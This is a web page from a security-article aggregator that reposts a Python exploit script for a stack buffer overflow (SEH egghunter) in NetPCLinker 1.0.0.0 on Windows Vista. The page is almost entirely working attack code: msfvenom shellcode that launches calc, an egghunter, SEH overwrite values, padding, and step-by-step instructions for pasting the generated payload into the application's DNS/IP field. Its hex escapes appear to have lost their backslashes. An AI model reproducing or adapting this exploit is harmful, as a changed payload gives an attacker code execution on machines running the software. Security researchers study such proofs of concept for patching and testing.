HackDig : Dig high-quality web security articles for hackers

NetPCLinker 1.0.0.0 Buffer Overflow

2020-06-29 17:46
#!/usr/bin/python# Exploit Title: NetPCLinker 1.0.0.0 Buffer Overflow (SEH Egghunter)# Date: 2019-06-28# Exploit Author: Saeed reza Zamanian# Vendor Homepage: https://sourceforge.net/projects/netpclinker/# Software Link: https://sourceforge.net/projects/netpclinker/files/# Version: 1.0.0.0# Tested on: Windows Vista SP1'''# Replicate Crash:  1) Install and Run the application  2) Go to second tab "Clients Control Panel"  3) Press Add button  4) Run the exploit , the exploit creates a text file named payload.txt  5) Copy payload.txt contents into the add client dialog , "DNS/IP" field  6) Press OK . Your shellcode will be executed by pressing OK button.'''#msfvenom -p windows/exec CMD=calc -f c -b "x00x0ax0dx33x35x36"#Bad Characters : x0ax0dx33x35x36shellcode = ("xdbxc4xd9x74x24xf4x5bxbex9ax32x43xd2x31xc9xb1""x30x83xc3x04x31x73x14x03x73x8exd0xb6x2ex46x96""x39xcfx96xf7xb0x2axa7x37xa6x3fx97x87xacx12x1b""x63xe0x86xa8x01x2dxa8x19xafx0bx87x9ax9cx68x86""x18xdfxbcx68x21x10xb1x69x66x4dx38x3bx3fx19xef""xacx34x57x2cx46x06x79x34xbbxdex78x15x6ax55x23""xb5x8cxbax5fxfcx96xdfx5axb6x2dx2bx10x49xe4x62""xd9xe6xc9x4bx28xf6x0ex6bxd3x8dx66x88x6ex96xbc""xf3xb4x13x27x53x3ex83x83x62x93x52x47x68x58x10""x0fx6cx5fxf5x3bx88xd4xf8xebx19xaexdex2fx42x74""x7ex69x2exdbx7fx69x91x84x25xe1x3fxd0x57xa8x55""x27xe5xd6x1bx27xf5xd8x0bx40xc4x53xc4x17xd9xb1""xa1xe8x93x98x83x60x7ax49x96xecx7dxa7xd4x08xfe""x42xa4xeex1ex27xa1xabx98xdbxdbxa4x4cxdcx48xc4""x44xbfx0fx56x04x40")egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x52x65x7ax61x8bxfaxafx75xeaxafx75xe7xffxe7"nSEH = 'xEBxAAx90x90' #Jump Back# (Vista)# PPR(ecx)  : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:Program FilesNetPCLinkerNPL.exe)SEH =  'x67x4bx49'offset = "RezaReza"+shellcode +'x41'*(1199-8-len(shellcode)-len(egghunter)-50)payload = offset+egghunter+"x90"*50+nSEH+SEHtry:    f=open("payload.txt","w")    print("[+] Creating %s bytes payload." %len(payload))    f.write(payload)    f.close()    print("[+] File created!")except:    print("File cannot be created.")


Source: 4210600202-BLW/eussi/moc.ytirucesxc

Read:123 | Comments:0 | Tags:No Tag

“NetPCLinker 1.0.0.0 Buffer Overflow”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools